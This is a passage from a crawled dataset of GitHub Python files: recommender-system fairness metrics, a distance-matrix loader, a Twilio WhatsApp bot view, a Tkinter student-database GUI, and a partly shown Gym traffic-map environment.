to 0. The more unequal the recsys is, the closer the Gini index gets to 1\n\n    If the 'top_n' parameter is specified, then the Gini index will measure inequality considering only the first\n    *n* items of every recommendation list of all users\n\n    Args:\n        top_n: it's a cutoff parameter, if specified the Gini index will be calculated considering only the first\n            'n' items of every recommendation list of all users. 
Default is None\n    \"\"\"\n\n    def __init__(self, top_n: int = None):\n        self.__top_n = top_n\n\n    def __str__(self):\n        name = \"Gini\"\n        if self.__top_n:\n            name += \" - Top {}\".format(self.__top_n)\n\n        return name\n\n    def __repr__(self):\n        return f'GiniIndex(top_n={self.__top_n})'\n\n    def perform(self, split: Split):\n        def gini(x: List):\n            \"\"\"\n            Inner helper which, given a list of values, calculates the Gini index\n\n            Args:\n                x: list of values of which we want to measure inequality\n            \"\"\"\n            # The rest of the code requires numpy arrays.\n            x = np.asarray(x)\n            sorted_x = np.sort(x)\n            n = len(x)\n            cumx = np.cumsum(sorted_x, dtype=float)\n            # The above formula, with all weights equal to 1, simplifies to:\n            return (n + 1 - 2 * np.sum(cumx) / cumx[-1]) / n\n\n        predictions = split.pred\n\n        score_dict = {'user_id': [], str(self): []}\n\n        prediction_items = predictions.item_id_column\n        if self.__top_n is not None:\n\n            prediction_items = []\n\n            for user_idx in predictions.unique_user_idx_column:\n                user_interactions_indices = predictions.get_user_interactions(user_idx,\n                                                                              head=self.__top_n,\n                                                                              as_indices=True)\n\n                user_items = predictions.item_id_column[user_interactions_indices]\n                prediction_items.append(user_items)\n\n            prediction_items = itertools.chain.from_iterable(prediction_items)\n\n        coun = Counter(prediction_items)\n\n        result = gini(list(coun.values()))\n\n        score_dict['user_id'].append('sys')\n        score_dict[str(self)].append(result)\n\n        return pd.DataFrame(score_dict)\n\n\nclass PredictionCoverage(FairnessMetric):\n    r\"\"\"\n    The Prediction Coverage metric measures in percentage how many distinct items are being recommended in relation\n    to all available items. It's a system-wide metric, so only its result will be returned and not those of every\n    user.\n    The metric is calculated as such:\n\n    $$\n    Prediction Coverage_{sys} = (\\frac{|I_p|}{|I|})\\cdot100\n    $$\n\n    Where:\n\n    - $I$ is the set of all available items\n    - $I_p$ is the set of recommended items\n\n    The $I$ must be specified through the 'catalog' parameter\n\n    Check the 'Beyond Accuracy: Evaluating Recommender Systems by Coverage and Serendipity' paper for more\n\n    Args:\n        catalog: set of item id of the catalog on which the prediction coverage must be computed\n    \"\"\"\n\n    def __init__(self, catalog: Set[str]):\n        self.__catalog = set(str(item_id) for item_id in catalog)\n\n    def __str__(self):\n        return \"PredictionCoverage\"\n\n    def __repr__(self):\n        return f'PredictionCoverage(catalog={self.__catalog})'\n\n    @property\n    def catalog(self):\n        return self.__catalog\n\n    def _get_covered(self, pred: Ratings):\n        \"\"\"\n        Private function which calculates all recommended items given a catalog of all available items (specified in\n        the constructor)\n\n        Args:\n            pred: Ratings object containing recommendation lists of all users\n\n        Returns:\n            Set of distinct items that have been recommended that also appear in the catalog\n        \"\"\"\n        pred_items = set(pred.unique_item_id_column)\n        return pred_items.intersection(self.catalog)\n\n    def perform(self, split: Split) -> pd.DataFrame:\n        prediction = {'user_id': [], str(self): []}\n\n        pred = split.pred\n\n        covered_items = self._get_covered(pred)\n\n        percentage = (len(covered_items) / len(self.__catalog)) * 100\n        coverage_percentage = np.round(percentage, 2)\n\n        prediction['user_id'].append('sys')\n        prediction[str(self)].append(coverage_percentage)\n\n        return pd.DataFrame(prediction)\n\n\nclass CatalogCoverage(PredictionCoverage):\n    r\"\"\"\n    The Catalog Coverage metric measures in percentage how many 
distinct items are being recommended in relation\n    to all available items. It's a system-wide metric, so only its result will be returned and not those of every\n    user. It differs from the Prediction Coverage since it allows for different parameters to come into play. If no\n    parameter is passed then it's a simple Prediction Coverage.\n    The metric is calculated as such:\n\n    $$\n    Catalog Coverage_{sys} = (\\frac{|\\bigcup_{j=1...N}reclist(u_j)|}{|I|})\\cdot100\n    $$\n\n    Where:\n\n    - $N$ is the total number of users\n    - $reclist(u_j)$ is the set of items contained in the recommendation list of user $j$\n    - $I$ is the set of all available items\n\n    The $I$ must be specified through the 'catalog' parameter\n\n    The recommendation list of every user ($reclist(u_j)$) can be reduced to the first *n* items with the\n    top-n parameter, so that catalog coverage is measured considering only the highest ranked items.\n\n    With the 'k' parameter one could specify the number of users that will be used to calculate catalog coverage:\n    k users will be randomly sampled and their recommendation lists will be used. The formula above becomes:\n\n    $$\n    Catalog Coverage_{sys} = (\\frac{|\\bigcup_{j=1...k}reclist(u_j)|}{|I|})\\cdot100\n    $$\n\n    Where:\n\n    - $k$ is the parameter specified\n\n    Obviously 'k' < N must hold, otherwise the recommendation lists of all users will simply be used\n\n    Check the 'Beyond Accuracy: Evaluating Recommender Systems by Coverage and Serendipity' paper and\n    page 13 of the 'Comparison of group recommendation algorithms' paper for more\n\n    Args:\n        catalog: set of item id of the catalog on which the prediction coverage must be computed\n        top_n: it's a cutoff parameter, if specified the Catalog Coverage will be calculated considering only the first\n            'n' items of every recommendation list of all users. Default is None\n        k: number of users randomly sampled. If specified, k users will be randomly sampled across all users and only\n            their recommendation lists will be used to compute the CatalogCoverage\n    \"\"\"\n\n    def __init__(self, catalog: Set[str], top_n: int = None, k: int = None):\n        super().__init__(catalog)\n        self.__top_n = top_n\n        self.__k = k\n\n    def __str__(self):\n        # If none of the parameters is passed, then it's simply a PredictionCoverage\n        name = \"CatalogCoverage (PredictionCov)\"\n\n        if self.__top_n:\n            name = \"CatalogCoverage\"\n            name += \" - Top {}\".format(self.__top_n)\n        if self.__k:\n            name = \"CatalogCoverage\"\n            name += \" - {} sampled users\".format(self.__k)\n\n        return name\n\n    def __repr__(self):\n        return f'CatalogCoverage(catalog={self.catalog}, top_n={self.__top_n}, k={self.__k})'\n\n    def _get_covered(self, pred: Ratings):\n\n        # IF k is passed, then we choose randomly k users and calc catalog coverage\n        # based on their predictions. 
We check that k is < n_user since if it is equal\n        # or greater, then the predictions generated for all users must be used\n        user_list = pred.unique_user_idx_column\n        if self.__k is not None and self.__k < len(pred.unique_user_id_column):\n\n            # use random.sample so the k users are drawn without replacement\n            # (random.choices could pick the same user more than once)\n            user_list = random.sample(list(user_list), k=self.__k)\n\n        prediction_items = []\n\n        for user_idx in user_list:\n            user_interactions_indices = pred.get_user_interactions(user_idx,\n                                                                   head=self.__top_n,\n                                                                   as_indices=True)\n\n            user_items = pred.item_id_column[user_interactions_indices]\n            prediction_items.append(user_items)\n\n        prediction_items = list(itertools.chain.from_iterable(prediction_items))\n        covered_items = set(prediction_items).intersection(self.catalog)\n\n        return covered_items\n\n\nclass DeltaGap(GroupFairnessMetric):\n    r\"\"\"\n    The Delta GAP (Group Average Popularity) metric lets you compare the average popularity \"requested\" by one or\n    multiple groups of users and the average popularity \"obtained\" with the recommendation given by the recsys.\n    It's a system-wide metric and the results of every group will be returned.\n\n    It is calculated as such:\n\n    $$\n    \\Delta GAP = \\frac{GAP_{recs} - GAP_{profile}}{GAP_{profile}}\n    $$\n\n    Users are split into groups based on the *user_groups* parameter, which contains names of the groups as keys,\n    and the percentage of users each group must contain as values. For example:\n\n        user_groups = {'popular_users': 0.3, 'medium_popular_users': 0.2, 'low_popular_users': 0.5}\n\n    Every user will be inserted in a group based on how many popular items the user has rated (in relation to the\n    percentage of users we specified as value in the dictionary):\n\n    * users with many popular items will be inserted into the first group\n    * users with niche items rated will be inserted into one of the last groups.\n\n    In general users are grouped by $Popularity\\_ratio$ in a descending order. $Popularity\\_ratio$ for a single user $u$\n    is defined as:\n\n    $$\n    Popularity\\_ratio_u = n\\_most\\_popular\\_items\\_rated_u / n\\_items\\_rated_u\n    $$\n\n    The *most popular items* are the first `pop_percentage`% items of all items ordered in a descending order by\n    popularity.\n\n    The popularity of an item is defined as the number of times it is rated in the `original_ratings` parameter\n    divided by the total number of users in the `original_ratings`.\n\n    It can happen that for a particular user of a group no recommendations are available: in that case the user will be\n    skipped and won't be considered in the $\\Delta GAP$ computation of its group. In case no user of a group has recs\n    available, a warning will be printed and the whole group won't be considered.\n\n    If the 'top_n' parameter is specified, then the $\\Delta GAP$ will be calculated considering only the first\n    *n* items of every recommendation list of all users\n\n    Args:\n        user_groups: Dict containing group names as keys and percentage of users as value, used to\n            split users in groups. Users with more popular items rated are grouped into the first group, users with\n            slightly less popular items rated are grouped into the second one, etc.\n        user_profiles: one or more `Ratings` objects containing interactions of the profile of each user\n            (e.g. the **train set**). It should be one for each split to evaluate!\n        original_ratings: `Ratings` object containing original interactions of the dataset that will be used to\n            compute the popularity of each item (i.e. 
the number of times it is rated divided by the total number of\n            users)\n        top_n: it's a cutoff parameter, if specified the DeltaGap will be calculated considering only the first\n            'n' items of every recommendation list of all users. Default is None\n        pop_percentage: How many (in percentage) *most popular items* must be considered. Default is 0.2\n    \"\"\"\n\n    def __init__(self, user_groups: Dict[str, float], user_profiles: Union[list, Ratings], original_ratings: Ratings,\n                 top_n: int = None, pop_percentage: float = 0.2):\n        if not 0 < pop_percentage <= 1:\n            raise ValueError('Incorrect percentage! Valid percentage range: 0 < percentage <= 1')\n\n        super().__init__(user_groups)\n        self._pop_by_item = get_item_popularity(original_ratings)\n\n        if not isinstance(user_profiles, list):\n            user_profiles = [user_profiles]\n        self._user_profiles = user_profiles\n        self.__top_n = top_n\n        self._pop_percentage = pop_percentage\n\n    def __str__(self):\n        name = \"DeltaGap\"\n        if self.__top_n:\n            name += \" - Top {}\".format(self.__top_n)\n        return name\n\n    # not a complete repr; it is still to be decided how to represent the 'ratings' objects\n    def __repr__(self):\n        return f\"DeltaGap(user_groups={self.user_groups}, top_n={self.__top_n}, pop_percentage={self._pop_percentage})\"\n\n    @staticmethod\n    def calculate_gap(group: Set[str], avg_pop_by_users: Dict[str, object]) -> float:\n        r\"\"\"\n        Compute the GAP (Group Average Popularity) formula\n\n        $$\n        GAP = \\frac{\\sum_{u \\in G} \\frac{\\sum_{i \\in i_u} pop_i}{|i_u|}}{|G|}\n        $$\n\n        Where:\n\n        - $G$ is the set of users\n        - $i_u$ is the set of items rated/recommended by/to user $u$\n        - $pop_i$ is the popularity of item $i$\n\n        Args:\n            group: the set of users (user_id)\n            avg_pop_by_users: average popularity by user\n\n        Returns:\n            score (float): gap score\n        \"\"\"\n        # e.g. two users with average item popularities 0.2 and 0.4\n        # give GAP = (0.2 + 0.4) / 2 = 0.3\n        total_pop = 0\n        for user in group:\n            if avg_pop_by_users.get(user):\n                total_pop += avg_pop_by_users[user]\n        return total_pop / len(group)\n\n    @staticmethod\n    def calculate_delta_gap(recs_gap: float, profile_gap: float) -> float:\n        \"\"\"\n        Compute the ratio between the recommendation gap and the user profiles gap\n\n        Args:\n            recs_gap: recommendation gap\n            profile_gap: user profiles gap\n\n        Returns:\n            score: delta gap measure\n        \"\"\"\n        result = 0\n        if profile_gap != 0.0:\n            result = (recs_gap - profile_gap) / profile_gap\n\n        return result\n\n    def perform(self, split: Split) -> pd.DataFrame:\n\n        # in order to point to the right `user_profile` set each time the\n        # `perform()` method is called, we pop the list but add the `user_profile` set\n        # back at the end so that DeltaGap is ready for another evaluation without\n        # need to instantiate it again\n        split_user_profile = self._user_profiles.pop(0)\n        self._user_profiles.append(split_user_profile)\n\n        predictions = split.pred\n\n        if self.__top_n:\n            predictions = predictions.take_head_all(self.__top_n)\n\n        most_pop_items = get_most_popular_items(self._pop_by_item, self._pop_percentage)\n        splitted_user_groups = self.split_user_in_groups(score_frame=split_user_profile, groups=self.user_groups,\n                                                         pop_items=most_pop_items)\n\n        split_result = defaultdict(list)\n        split_result['user_id'] = ['sys']\n\n        for group_name in splitted_user_groups:\n\n            # we don't consider users of the group for which we do not have any recommendation\n            valid_group = splitted_user_groups[group_name].intersection(set(predictions.unique_user_id_column))\n\n            if len(valid_group) == 0:\n                logger.warning(f\"Group {group_name} won't be considered in the DeltaGap since no recs are available \"\n                               f\"for 
any user of said group!\")\n continue\n\n # Computing avg pop by users recs for delta gap\n avg_pop_by_users_recs = self.get_avg_pop_by_users(predictions, self._pop_by_item, valid_group)\n # Computing avg pop by users profiles for delta gap\n avg_pop_by_users_profiles = self.get_avg_pop_by_users(split_user_profile, self._pop_by_item, valid_group)\n\n # Computing delta gap for every group\n recs_gap = self.calculate_gap(group=valid_group, avg_pop_by_users=avg_pop_by_users_recs)\n profile_gap = self.calculate_gap(group=valid_group, avg_pop_by_users=avg_pop_by_users_profiles)\n group_delta_gap = self.calculate_delta_gap(recs_gap=recs_gap, profile_gap=profile_gap)\n\n split_result['{} | {}'.format(str(self), group_name)].append(group_delta_gap)\n\n return pd.DataFrame(split_result)\n","repo_name":"swapUniba/ClayRS","sub_path":"clayrs/evaluation/metrics/fairness_metrics.py","file_name":"fairness_metrics.py","file_ext":"py","file_size_in_byte":23450,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"1783745483","text":"# Load distances\nDISTANCES = []\n# DISTANCES is created as a global object so that it can be accessed by main function and object methods\n# of the truck class.\n\n\ndef load_distance_data(filename):\n \"\"\"Load data from distances CSV into distances triangle matrix\"\"\"\n # Inner and outer loop both have number of iterations proportional to N, giving time complexity of O(N^2)\n # Final result is nested list structure with about (N^2)/2 elements, giving space complexity O(N^2)\n\n # Open file\n with open(filename) as distancesFile:\n # Extract lines of file\n lines = distancesFile.readlines()\n\n # For each line in file\n for i in range(len(lines)):\n\n # Add a list to nested DISTANCES list\n DISTANCES.append([])\n\n # Extract distance values from line\n line = [float(val) for val in lines[i].strip().split(\",\")]\n\n # For each line so far, plus one\n for j in range(i + 1):\n # Append distance value to DISTANCES nested list structure\n DISTANCES[i].append(line[j])\n j += 1\n\n\ndef distance(location_index_alpha, location_index_beta):\n \"\"\"Use distance triangle matrix to calculate distance between two locations\"\"\"\n # Size of input does not vary (two integers) so space and time complexity are constant.\n try:\n return DISTANCES[location_index_alpha][location_index_beta]\n except IndexError:\n # If initial access triggers an IndexError, try access after swapping row index and column index\n return DISTANCES[location_index_beta][location_index_alpha]\n","repo_name":"burnermax37/C950_Algorithms_Project","sub_path":"Distances.py","file_name":"Distances.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31213295110","text":"from django.shortcuts import render,HttpResponse\nfrom twilio.rest import Client\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\n\nclient=Client(settings.TWILIO_ACCOUNT_SID,settings.TWILIO_AUTH_TOKEN)\n\n@csrf_exempt\n\n\ndef bot(request):\n message= request.POST[\"Body\"]\n sender_name=request.POST[\"ProfileName\"]\n sender_number=request.POST[\"From\"]\n if message=='Hi':\n client.messages.create(to='whatsapp:+91xxxxxxx',\n from_='whatsapp:+14155238886',\n body=f\"Hello,{sender_name}\")\n\n return 
HttpResponse(\"hello\")\n","repo_name":"nadiya123123/twilio_verificatin","sub_path":"wpapi/twilioapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43367126616","text":"from tkinter import*\nimport stdDB_BackEnd\nfrom tkinter import ttk\nimport tkinter.messagebox\nimport random\nimport datetime\nimport time\nimport tempfile, os\n\n#FrontEnd\n\nroot = Tk()\nroot.title(\"STUDENT DATABASE MANAGEMENT SYSTEM\")\nroot.geometry('1300x1300')\nroot.resizable(width=False , height=False)\n\nStdID = StringVar()\nFirstname = StringVar()\nSurname = StringVar()\nDoB = StringVar()\nAge = StringVar()\nGender = StringVar()\nAddress= StringVar()\nMobile = StringVar()\n\n#==================================FRAMES=======================================\nMainFrame = Frame(root,width =1295, height =1295, bd=10, relief=RIDGE, bg=\"cadet blue\")\nMainFrame.grid()\n\nTopFrame = Frame(root, width =1275, height =1295, bd = 8, relief=RIDGE)\nTopFrame.place(x=10, y=10)\nTitleFrame = Frame(root, width =1256, height =130, bd =10, relief=RIDGE)\nTitleFrame.place(x=20, y=20)\n\nTopFrame1 = Frame(root, width =1255, height =550, bd =10, relief=RIDGE, bg=\"cadet blue\")\nTopFrame1.place(x=20, y=150)\n\nLeftFrame = Frame(TopFrame1, width =400, height =417, bd =10, relief=RIDGE)\nLeftFrame.place(x=0, y=0)\nRightFrame = Frame(TopFrame1, width =832, height =417, bd =10, relief=RIDGE)\nRightFrame.place(x=403, y=0)\n\n\nButtonFrame = Frame(TopFrame1, width =1235, height =100, bd =10, relief=RIDGE)\nButtonFrame.place(x=0 , y=420)\n\n#=======================================TITLE==============================================\n\nTitle = Label(TitleFrame, font=('arial', 53,'bold'), text=\"STUDENT MANAGEMENT SYSTEM\", bd=10)\nTitle.place(x=25 ,y=10)\n\n#====================================== FUNCTIONS ===================================================\ndef iExit():\n iExit = tkinter.messagebox.askyesno(\"Student Management System\",\"Confirm if you want to exit\")\n if iExit > 0:\n root.destroy()\n return\n\ndef iReset():\n txtStdID.delete(0, END)\n txtFirstname.delete(0, END)\n txtSurname.delete(0, END)\n txtDoB.delete(0, END)\n txtAge.delete(0, END)\n cboGender.set(\"\")\n txtAddress.delete(0, END)\n txtMobile.delete(0, END)\n\ndef addData():\n if StdID.get() ==\"\" or Firstname.get() ==\"\" or Surname.get() ==\"\":\n tkinter.messagebox.askyesno(\"Student Management System\",\"Enter correct data please\")\n\n else:\n stdDB_BackEnd.addStdRec(StdID.get(),Firstname.get(),Surname.get(),DoB.get(),Age.get(),Gender.get(),Address.get(),Mobile.get())\n\n super(studentlist, self).delete()\n studentlist.insert(END.StdID.get(),Firstname.get(),Surname.get(),DoB.get(),Age.get(),Gender.get(),Address.get(),Mobile.get())\n\n DisplayData()\n\ndef DisplayData():\n result = stdDB_BackEnd.viewData()\n if len(result)!= 0:\n studentlist.delete(studentlist.get_children())\n for row in result:\n studentlist.insert('',END,values =row)\n\n\n\ndef StudentRec():\n global sd\n iReset()\n viewInfo = studentlist.focus()\n learnerData = studentlist.item(viewInfo)\n sd = learnerData['values']\n\n txtStdID.insert(END,sd[1])\n txtFirstname.insert(END,sd[2])\n txtSurname.insert(END,sd[3])\n txtDoB.insert(END,sd[4])\n txtAge.insert(END,sd[5])\n Gender.set(sd[6])\n txtAddress.insert(END,sd[7])\n txtMobile.insert(END,sd[8])\n\ndef DeleteData():\n if(len(StdID.get())!=0):\n stdDB_BackEnd.deleteRec(sd[0])\n iReset()\n DisplayData()\n 
tkinter.messagebox.showinfo(\"Data Entry Form\",\"Record Successfully Deleted\")\n\n\n\n\n#==================================LABELS & BUTTONS========================================\nlblStdID = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Student ID\", bd =7)\nlblStdID.place(x=0 , y=0)\ntxtStdID = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=StdID)\ntxtStdID.place(x=120, y=0)\n\nlblFirstname = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Firstname\", bd =7)\nlblFirstname.place(x=0 , y=45)\ntxtFirstname = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Firstname)\ntxtFirstname.place(x=120, y=45)\n\nlblSurname = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Surname\", bd =7)\nlblSurname.place(x=0 , y=90)\ntxtSurname = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Surname)\ntxtSurname.place(x=120, y=90)\n\nlblDoB = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Date of Birth\", bd =7)\nlblDoB .place(x=0 , y=135)\ntxtDoB = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=DoB)\ntxtDoB .place(x=120, y=135)\n\nlblAge = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Age\", bd =7)\nlblAge.place(x=0 , y=180)\ntxtAge = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Age)\ntxtAge.place(x=120, y=180)\n\nGender = Label(LeftFrame, text=\"Gender:\",font=('arial',12,'bold'), bd=5)\nGender.place(x=0, y=225)\ncboGender = ttk.Combobox(LeftFrame, font=('arial', 12, 'bold'), width=26, state='readonly', textvariable=Gender)\ncboGender['values']= ('', 'Male', 'Female')\ncboGender.current(0)\ncboGender.place(x=120, y=225)\n\nlblAddress = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Address\", bd =7)\nlblAddress.place(x=0 , y=270)\ntxtAddress = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Address)\ntxtAddress.place(x=120, y=270)\n\nlblMobile = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Mobile\", bd =7)\nlblMobile.place(x=0 , y=315)\ntxtMobile = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Mobile)\ntxtMobile.place(x=120, y=315)\n\n#=======================================TREE VIEW====================================================\ncolumn = ('no','stdid','firstname','surname','dob','age','gender','address','mobile')\n\ntree = ttk.Treeview(RightFrame, column=column, show='headings')\n\ntree.heading('no', text='No')\ntree.heading('stdid', text='Student ID')\ntree.heading('firstname', text='Firstname')\ntree.heading('surname', text='Surname')\ntree.heading('dob', text='Date of Birth')\ntree.heading('age', text='Age')\ntree.heading('gender', text='Gender')\ntree.heading('address', text='Address')\ntree.heading('mobile', text='Mobile')\n\n\ntree.column(\"no\", width=10)\ntree.column(\"stdid\", width=10)\ntree.column(\"firstname\", width=10)\ntree.column(\"surname\", width=10)\ntree.column(\"dob\", width=10)\ntree.column(\"age\", width=10)\ntree.column(\"gender\", width=10)\ntree.column(\"address\", width=10)\ntree.column(\"mobile\", width=10)\n\ntree.place(x=0,y=0, height=395, width=810)\n\n#======================================= BUTTONS ================================================\nbtnAddNew = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Add New\", width=12,height=2, command=addData)\nbtnAddNew.place(x=10, y=0)\n\nbtnDisplay = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Display\", width=13,height=2, command=DisplayData)\nbtnDisplay.place(x=240, y=0)\n\nbtnDelete = 
Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Delete\", width=13,height=2, command=DeleteData)\nbtnDelete.place(x=480, y=0)\n\nbtnReset = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Reset\", width=13,height=2, command=iReset)\nbtnReset.place(x=720, y=0)\n\nbtnExit = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Exit\", width=13,height=2, command=iExit)\nbtnExit.place(x=970, y=0)\n\n\nroot.mainloop();","repo_name":"shija-python/Student-Management-System","sub_path":"Student_DB_FrontEnd.py","file_name":"Student_DB_FrontEnd.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40832275057","text":"import logging\r\nimport time\r\nimport gym\r\nimport numpy as np\r\nimport random\r\nimport math\r\nfrom gym import spaces\r\nfrom gym.utils import seeding\r\nimport color\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass CarmapEnv(gym.Env):\r\n metadata = {\r\n 'render.modes': ['human', 'rgb_array'],\r\n 'video.frames_per_second': 50\r\n }\r\n\r\n def __init__(self):\r\n # 设置最大的车流数量\r\n self.car_num = 3000\r\n\r\n # 设置车道数\r\n self.lan_num = 8\r\n\r\n # 屏幕世界尺寸\r\n self.screen_world_width = 800\r\n self.screen_world_height = 800\r\n\r\n # 实际世界尺寸(车道宽度为3.2)\r\n self.real_world_width = 200\r\n self.real_world_height = 200\r\n self.real_lane_width = 3.2\r\n self.real_lane_height = 3.2\r\n # 实际车辆尺寸(长3,宽3)\r\n self.real_car_width = 3\r\n self.real_car_height = 3\r\n\r\n # 归一化尺寸\r\n self.min_xposition = 0\r\n self.max_xposition = 1\r\n self.min_yposition = 0\r\n self.max_yposition = self.real_world_height / self.real_world_width\r\n self.normalization_world_width = self.max_xposition - self.min_xposition\r\n self.normalization_world_height = self.max_yposition - self.min_yposition\r\n\r\n # 屏幕尺寸和归一化尺寸之比(x轴,y轴)\r\n self.screen_xscale = self.screen_world_width / self.normalization_world_width\r\n self.screen_yscale = self.screen_world_height / self.normalization_world_height\r\n\r\n # 实际尺寸和归一化尺寸之比(x轴,y轴)\r\n self.real_xscale = self.real_world_width / self.normalization_world_width\r\n self.real_yscale = self.real_world_height / self.normalization_world_height\r\n\r\n # 屏幕车辆,车道尺寸\r\n self.screen_car_width = self.screen_xscale * self.real_car_width / self.real_xscale\r\n self.screen_car_height = self.screen_yscale * self.real_car_height / self.real_yscale\r\n self.screen_lan_width = self.screen_xscale * self.real_lane_width / self.real_xscale\r\n self.screen_lan_height = self.screen_yscale * self.real_lane_width / self.real_yscale\r\n self.border_width = (self.screen_world_width / 2) - (self.lan_num / 2) * self.screen_lan_width\r\n self.border_height = (self.screen_world_height / 2) - (self.lan_num / 2) * self.screen_lan_height\r\n\r\n # 设置最大速度\r\n self.real_maxspeed = 16.6667\r\n self.real_minspeed = 0.0\r\n self.normalization_maxspeed = self.real_maxspeed / self.real_xscale\r\n self.normalization_minspeed = self.real_minspeed / self.real_xscale\r\n # 设置最大通信距离\r\n self.real_con_dis = 30\r\n self.normalization_maxspeed = self.real_con_dis / self.real_xscale\r\n\r\n\r\n #设置最低状态\r\n self.car_low_state = np.array([\r\n [self.min_xposition, self.normalization_maxspeed,270],\r\n [self.min_yposition, self.normalization_maxspeed,180]],\r\n dtype = np.float64\r\n )\r\n #设置最高状态\r\n self.car_high_state = np.array([\r\n [self.max_xposition, self.normalization_maxspeed, 90],\r\n [self.max_yposition, self.normalization_maxspeed, 0]],\r\n dtype=np.float64\r\n )\r\n\r\n 
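# Note (illustrative, derived from the scale definitions above): a real-world\r\n        # coordinate is first normalized by real_xscale / real_yscale and then mapped\r\n        # to pixels by screen_xscale / screen_yscale, e.g. with real_world_width=200\r\n        # and screen_world_width=800, x = 100 m -> 100/200 = 0.5 -> 0.5*800 = 400 px.\r\n        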
#设置车辆观测空间(连续BOX)(观察:x位置速度,y位置速度)\r\n self.car_observation_space = spaces.Box(\r\n low = self.car_low_state,\r\n high = self.car_high_state,\r\n dtype=np.float64\r\n )\r\n\r\n #设置随即种子\r\n self.seed()\r\n self.s_id = -1\r\n self.t_id = -1\r\n self.viewer = None\r\n self.car_state = None\r\n self.connect_state = None\r\n\r\n def seed(self, seed=None):\r\n self.np_random, seed = seeding.np_random(seed)\r\n return [seed]\r\n\r\n def car_step(self, action):\r\n return self.car_state,{}\r\n\r\n def rans(self):\r\n self.ran = random.sample(range(self.min_xposition * 1000, self.max_xposition * 1000), self.car_num)\r\n self.ran2 = self.np_random.uniform(range(0, int(self.normalization_maxspeed * 10000)),self.car_num)\r\n\r\n def reset(self):\r\n #状态:x位置,y位置,速度大小,速度方向\r\n reset_state = []\r\n self.rans()\r\n for each in range(self.car_num):\r\n # 八车道十字路口,右侧通行规则\r\n lane = random.randrange(1,17)\r\n # 1-8车道用于X轴,1-4向东,5-8向西\r\n if lane <= 8:\r\n ypos = (self.border_height + (lane - 1) * self.screen_lan_width + self.screen_lan_width/2) / self.screen_yscale\r\n if lane <= 4:\r\n v = 0\r\n xpos = self.ran[each]/1000\r\n else:\r\n v = 180\r\n xpos = self.ran[each]/1000\r\n # 9-16车道用于Y轴,9-13向东,13-16向西\r\n elif lane >= 9 and lane<=16:\r\n xpos = (self.border_width + (lane - 9) * self.screen_lan_width + self.screen_lan_width/2) / self.screen_xscale\r\n if lane <= 13:\r\n v = 90\r\n ypos = self.ran[each]/1000\r\n else:\r\n v = 270\r\n ypos = self.ran[each]/1000\r\n reset_state.append([[xpos, ypos],[self.ran2[each] / 10000, v]])\r\n self.car_state = np.array(reset_state)\r\n return np.array(self.car_state)\r\n\r\n def render(self, connect1=[], connect2=[], c1=(0,0,0), c2=(1,0,0),mode='human'):\r\n if self.viewer is None:\r\n from gym.envs.classic_control import rendering\r\n colors = color.ncolors(self.car_num)\r\n #生成界面\r\n self.viewer = rendering.Viewer(self.screen_world_width, self.screen_world_height)\r\n\r\n self.boder1 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder1.set_color(0.745, 0.745, 0.745)\r\n self.viewer.add_geom(self.boder1)\r\n\r\n self.boder2 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder2.set_color(0.745, 0.745, 0.745)\r\n self.boder2.add_attr(rendering.Transform(translation=(0, self.screen_world_height - self.border_height)))\r\n self.viewer.add_geom(self.boder2)\r\n\r\n self.boder3 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder3.set_color(0.745, 0.745, 0.745)\r\n self.boder3.add_attr(rendering.Transform(translation=(self.screen_world_width - self.border_width, 0)))\r\n self.viewer.add_geom(self.boder3)\r\n\r\n self.boder4 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder4.set_color(0.745, 0.745, 0.745)\r\n self.boder4.add_attr(rendering.Transform(translation=(self.screen_world_width - self.border_width, self.screen_world_height - self.border_height)))\r\n self.viewer.add_geom(self.boder4)\r\n\r\n #绘制小车\r\n l, r, t, b = -self.screen_car_width / 2, self.screen_car_width / 2, -self.screen_car_height/2, self.screen_car_height/2\r\n self.car_name = locals()\r\n self.cartrans_name = locals()\r\n for each in range(self.car_num):\r\n self.car_name['car' + str(each)] = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n # car_name['car' + 
